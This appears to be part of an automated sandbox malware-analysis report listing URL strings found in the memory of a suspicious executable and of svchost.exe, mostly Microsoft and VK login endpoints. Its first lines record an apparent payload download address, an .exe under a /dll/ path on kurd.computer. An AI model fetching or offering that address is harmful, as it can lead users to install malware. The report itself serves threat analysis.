Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exex_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer:80/dll/builddoc.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer:80/dll/builddoc.exe)x
Source: svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1553593331.000001F4D86EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srfsrf
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srfrf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf$
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srfice
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfen
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
Source: svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000034.00000003.1518831614.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dt
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
Source: svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805021
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806043
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376112342.000001F4D8F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000034.00000003.1361507616.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srff
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000034.00000002.2848786345.000001F4D9671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.vk.com/
